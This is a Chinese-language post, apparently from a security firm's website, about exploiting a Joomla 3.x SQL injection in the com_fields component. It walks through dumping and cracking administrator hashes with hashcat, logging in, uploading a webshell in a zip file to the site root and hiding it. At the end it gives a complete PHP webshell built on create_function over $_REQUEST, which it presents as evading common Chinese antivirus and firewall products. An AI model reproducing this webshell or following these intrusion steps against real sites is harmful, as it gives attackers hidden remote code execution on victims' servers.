eSafe白帽駭客資安網-網絡安全背後的巨人,提供駭客,網站入侵測試,網站被駭,網站漏洞,駭客入侵,資訊安全,入侵,ecshop,wordpress,漏洞修復,木馬清除,資安服務

Joomla 3.X版本 最新SQL注入漏洞復現

  Joomla 3.X版本 最新SQL注入漏洞 
 
 
 Joomla 3.X版本爆出高危SQL注入漏洞,產生漏洞的位置是位於con_fields的組件
 
功能上,之前我們eSafe白帽資安網在五月份就已經發現這個3.70版本的漏洞了,並發佈到
 
我們安全研究欄目裡,鏈接如下:joomla 注入漏洞 獲取管理員及執行命令漏洞,
 
加上最近很多用Joomla 開源程序的網站,都被駭客入侵並篡改了網站的快照,尤
 
其國內的一些外貿用戶,以及設有國外站點的公司,都深受其害。目前該漏洞包含
 
3.X所有版本,不得不重視。eSafe白帽資安網公司是一家專注於:主機安全網站安全
 
、網站安全檢測、網站漏洞修復,滲透測試,安全服務於一體的網絡安全服務提供商

 
 
 
下面我們eSafe白帽資安網對Joomla程序代碼,進行了詳細的網站安全分析,以及漏洞原理
 
和利用方法做一下記錄。
 
Joomla漏洞的具體細節可以看下這篇安全文章
 
 
http://www.esafe.tw.com/article/20170531/joomla.html,我們eSafe白帽資安網詳細分
 
析過了,如果還是不太瞭解的話,可以去百度搜索下Joomla相關的漏洞詳情,我們
 
eSafe白帽資安網在這裡給大家介紹一下該如何利用這個Joomla漏洞。

 
在對其Joomla網站滲透測試當中,直接手動獲取賬戶密碼,獲取到的hash值,
 
hashcat默認就支持該散列類型,用hashcat工具先暴力猜解一下,破解出來的時間根
 
據計算機的配置,CPU核心高的話,時間會快一些。總之拿到的Joomla管理員的賬
 
號密碼,就可以正常的登錄網站的後台,然後進去拿網站的權限,上傳我們的網站
 
木馬,Joomla後台拿shell的辦法就是很簡單的,跟之前的那個wordpress主題漏洞
 
道理是一個樣的,上傳zip的壓縮包,然後解壓到網站根目錄下即可。eSafe白帽資安網公
 
司是一家專注於:主機安全、網站安全、網站安全檢測、網站漏洞修復,滲透測
 
試,安全服務於一體的網絡安全服務提供商。
 
 
上傳好我們的網站木馬後,盡可能的把文件隱藏到比較隱蔽的地方,下面給大家提
 
供一個免殺的網站木馬,什麼安全狗,什麼雲鎖,護衛神,直接過。網站木馬免殺
 
方法非常簡單,通過php創建自定義函數,然後調用該函數,而函數里面可接任意值,
 
基本是沒有任何木馬特徵的。代碼如下:<?php $sl = create_function('', @
 
$_REQUEST['esafe.tw']);$sl();?>
 
分享: